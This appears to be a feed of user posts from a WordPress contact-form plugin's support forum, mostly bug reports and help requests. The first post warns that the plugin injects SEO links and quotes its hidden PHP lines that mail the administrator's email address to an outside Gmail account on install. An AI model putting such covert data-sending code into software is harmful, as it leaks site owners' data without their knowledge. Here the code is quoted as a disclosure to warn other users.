As well as adding links to an SEO site, the plugin also grabs your administrator email address and mails it off to a gmail account:
$subj = get_option('siteurl');
$msg = "Installed" ;
$from = get_option('admin_email');
mail("[email protected]", $subj, $msg, $from);
I can’t tell whether this is deliberate on the part of the author, or a hack, but either way this plugin cannot currently be trusted unless you are willing to manually edit out the nasties.
]]>this plugin is looking simple and good, but it s taking the site down as it tried to inject url like : https://www.packages-seo.co in the top of the code
]]>I am using a Yootheme template. After installing this plugin, all I got was my background.
]]>in WP_DEBUG-Mode, the plugin forces many notices. They’re often easy to fix, like:
easy-form.class.php, line 56
if (isset($_POST[‘wpcf_easyform_submitted’]) && $_POST[‘wpcf_easyform_submitted’]) {
Or notices within the admin backend: often it’s just an echo %var% but %var% doesn’t exist.
]]>Everything on my pages disappeared after installing this pluggin!
]]>Hello,
didn’t find a way to contact the developer directly. But if he is interested in a German translation of this plug-in, please write an e-mail to:
[email protected]
Currently I’m using a MailPress contact form on my blog (AB-WebLog.com) and I’m not totally happy with it. This new plug-in looks interesting.
Best regards
Andreas
The plugin only works on the ‘top level’ site. On subsites you cannot find a form once it has been saved (it does not appear in the edit list).
]]>Hi there
I am having a problem trying to get text to show in the submit button. I have entered a name and field label (SEND) and chosen submit button. I’ve also chosen a background colour of purple for the button and white for the text but nothing shows except a purple rectangle. I have tried many colour combinations and all I get every time is a rectangle with no text. I haven’t entered any values.
Am I doing something wrong? Any help would be really appreciated. Apart from this problem the plugin is great – I love the flexibility.
Thanks
]]>